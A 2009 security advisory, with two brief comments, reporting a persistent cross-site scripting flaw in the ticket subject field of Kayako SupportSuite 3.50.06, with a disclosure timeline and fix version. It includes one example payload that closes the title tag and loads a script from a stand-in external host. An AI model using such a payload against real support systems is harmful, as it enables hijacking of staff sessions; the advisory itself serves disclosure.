Aug 08, 2009
[NGENUITY] Ticket Subject Persistent XSS in Kayako SupportSuite
nGenuity Information Services – Security Advisory
Advisory ID: NGENUITY-2009-008 - Ticket Subject Persistent XSS in Kayako SupportSuite
Application: SupportSuite v3.50.06
Vendor: Kayako
Vendor website: http://www.kayako.com
Author: Adam Baldwin (adam_baldwin@ngenuity-is.com)
Class: Persistent Cross-Site Scripting
I. BACKGROUND
"SupportSuite is [Kayako's] flagship product, integrating the ticket and e-mail management features of eSupport with the live chat and visitor monitoring features of LiveResponse." [1]
II. DETAILS
The subject field of a newly created support ticket is not properly encoded before being sent to the browser when the ticket details are viewed. For more information on cross-site scripting, please refer to the Common Weakness Enumeration specification available at cwe.mitre.org [2].
An example attack might look similar to the following:
    </title><script src="example.com/attack.js"></script>
This vulnerability is fixed in version 3.60.x.
III. REFERENCES
[1] - http://www.kayako.com
[2] - http://cwe.mitre.org/data/definitions/79.html
IV. VENDOR COMMUNICATION
7.17.2009 - Vulnerability Discovery
7.20.2009 - Initial Vendor Response
7.21.2009 - Patch created, Will be pushed to next stable release
8.08.2009 - Advisory released
Copyright (c) 2009 nGenuity Information Services, LLC

By Jamie Edwards, August 8, 2009 @ 10:53 am
This defect is fixed in 3.60.x
By aaron_howell, August 8, 2009 @ 11:07 am
Thanks for the update, Jamie.